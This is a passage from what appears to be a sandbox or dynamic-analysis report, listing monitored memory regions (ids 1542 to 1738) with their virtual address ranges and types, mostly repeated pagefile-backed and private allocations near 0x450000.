"pagefile_0x0000000000450000" filename = "" Region: id = 1542 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1543 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1544 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1545 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1546 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1547 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1548 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1549 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1550 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1551 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1552 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1553 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1554 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1555 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1556 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1557 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1558 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1559 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1560 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1561 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1562 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1563 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1564 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1565 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1566 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1567 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1568 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1569 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1570 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1571 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1572 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1573 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1574 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1575 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1576 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1577 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1578 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1579 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1580 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1581 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1582 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1583 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1584 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1585 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1586 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1587 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1588 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1589 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1590 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1591 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1592 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1593 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1594 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1595 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1596 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1597 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1598 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1599 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1600 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1601 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1602 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1603 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1604 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1605 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1606 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1607 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1608 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1609 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1610 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1611 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1612 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1613 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1614 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1615 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1616 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1617 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1618 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1619 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1620 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1621 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1622 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1623 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1624 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1625 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1626 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1627 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1628 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1629 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1630 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1631 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1632 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1633 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1634 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1635 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1636 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1637 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1638 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1639 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1640 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1641 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1642 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1643 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1644 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1645 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1646 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1647 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1648 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1649 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1650 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1651 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1652 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1653 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1654 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1655 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1656 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1657 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1658 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1659 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1660 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1661 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1662 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1663 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1664 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1665 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1666 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1667 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1668 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1669 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1670 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1671 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1672 start_va = 0xc2e0000 end_va = 0xc7d2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c2e0000" filename = "" Region: id = 1673 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1674 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1675 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1676 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1677 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1678 start_va = 0x112e0000 end_va = 0x117d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000112e0000" filename = "" Region: id = 1679 start_va = 0x450000 end_va = 0x453fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1680 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1681 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1682 start_va = 0x2240000 end_va = 0x224efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" Region: id = 1683 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1684 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1685 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1686 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1687 start_va = 0x2240000 end_va = 0x224efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" Region: id = 1688 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1689 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1690 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1691 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1692 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1693 start_va = 0x2240000 end_va = 0x224efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" Region: id = 1694 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1695 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1696 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1697 start_va = 0x460000 end_va = 0x47dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1698 start_va = 0x2240000 end_va = 0x224efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" Region: id = 1699 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1700 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1701 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1702 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1703 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1704 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1705 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1706 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1707 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1708 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1709 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1710 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1711 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1712 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1713 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1714 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1715 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1716 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1717 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1718 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1719 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1720 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1721 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1722 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1723 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1724 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1725 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1726 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1727 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1728 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1729 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1730 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1731 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1732 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1733 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 1734 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1735 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1736 start_va = 0x450000 end_va = 0x46dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1737 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 1738 start_va = 0x450000 end_va = 0x45efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" 